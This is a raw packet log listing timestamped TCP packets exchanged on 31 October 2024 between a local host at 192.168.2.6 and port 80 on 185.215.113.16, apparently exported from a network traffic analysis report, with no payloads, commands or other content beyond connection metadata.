                                                                            Oct 31, 2024 20:49:48.904882908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.904937983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.904951096 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.904995918 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:48.970315933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.970355988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.970370054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.970602989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:48.977019072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.977068901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.977081060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.977125883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:48.977199078 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:48.977333069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.977427006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:48.977504969 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:48.977550030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.018620014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.018678904 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.018678904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.023705006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.023757935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.023818016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.023832083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.023902893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.090657949 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.090703964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.090832949 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.090872049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.095843077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.095921993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.095926046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.095940113 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.096049070 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.096153975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.136823893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.136867046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.136882067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.137048006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.142507076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.142544031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.142602921 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.142664909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.193286896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.209431887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.209460020 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.209472895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.209528923 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.214925051 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.214943886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.214958906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.215008020 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.215038061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.215063095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.215246916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.215257883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.215308905 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.255727053 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.258845091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.258863926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.258938074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.258982897 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.264429092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.264465094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.264482021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.264502048 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.264529943 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.328403950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.328443050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.328458071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.328547955 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.333812952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.333849907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.333909988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.380738020 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.485721111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.485738039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.485749006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.485862017 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.485991001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486004114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486015081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486121893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.486121893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.486241102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486258984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486351967 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.486783981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486798048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486809015 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486828089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486840010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486851931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.486870050 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.486871004 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.486922026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.487416983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.487431049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.487502098 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.495769024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.495903969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.496020079 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.506119967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.506141901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.506150007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.506283998 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.552663088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.567053080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.567070007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.567256927 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.572607994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.572657108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.572669983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.572741032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.604321957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.604357004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.604450941 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.621864080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.621922970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.621936083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.622055054 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.622148991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.622189045 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.662061930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.691817999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.692177057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.692193031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.692222118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.692300081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.692312956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.692323923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.692343950 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.692374945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.743149996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.743567944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.743590117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.743628025 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.744956970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.744972944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.745008945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.786988974 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.812073946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.812091112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.812104940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.812169075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.812314034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.812326908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.812339067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.812381029 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.812381029 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.863630056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.863663912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.863671064 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.863925934 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.863957882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.863970995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.863995075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.912055016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.930995941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.931030989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.931044102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.931137085 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.931279898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.931337118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.937072992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.937156916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.937211990 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:49.937328100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.937417030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:49.937450886 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.012218952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.012244940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.012258053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.012285948 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.012413979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.012563944 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.017126083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.051928997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.052088976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.052814007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.057543993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.057562113 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.057626963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.062604904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.062623978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.062722921 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.062746048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.062789917 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.067624092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.115185976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.131184101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.131225109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.131237984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.131295919 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.131622076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.131637096 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.131694078 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.171252012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171273947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171288013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171454906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171555042 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.171694994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171749115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.171849966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171861887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171875000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.171904087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.224567890 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.250355959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.250473976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.250511885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.250627995 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.250747919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.250761032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.250967026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.289932013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290004969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290015936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290034056 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.290076971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.290184975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290196896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290208101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290220976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290242910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.290257931 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.290782928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290843010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.290893078 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.290958881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.333944082 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.369188070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.369235992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.369249105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.369410038 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.369523048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.369537115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.369669914 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.408946991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.408974886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.409008026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.409076929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.409076929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.409393072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.458952904 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.560455084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.560486078 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.560499907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.560523033 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.560842037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.560880899 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.560972929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.560986042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.560997963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561009884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561064959 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.561064959 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.561661959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561672926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561686039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561697960 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561709881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561722040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.561728954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.561728954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.561821938 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.562372923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.569298029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.569333076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.569344044 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.608572006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.608640909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.608721972 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.647567987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.647660017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.647676945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.647694111 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.647732019 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.647880077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.647897959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.647911072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.647970915 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.679263115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.679297924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.679332972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.724633932 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.727225065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.727300882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.727323055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.727364063 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.766369104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.766402006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.766413927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.766472101 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.766472101 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.766608953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.766624928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.766676903 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.766860008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.818311930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.849530935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.849570990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.849585056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.849630117 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.849829912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.849843025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.849903107 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.886430979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.886507988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.886519909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.886532068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.886847973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.886854887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.886867046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.886878014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.886928082 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.927707911 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.969011068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.969119072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.969131947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.969171047 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:50.969413042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.969424963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:50.969469070 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.011692047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.011729956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.011742115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.011756897 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.011790991 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:51.011990070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.012001038 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:51.012010098 CET8049749185.215.113.16192.168.2.6
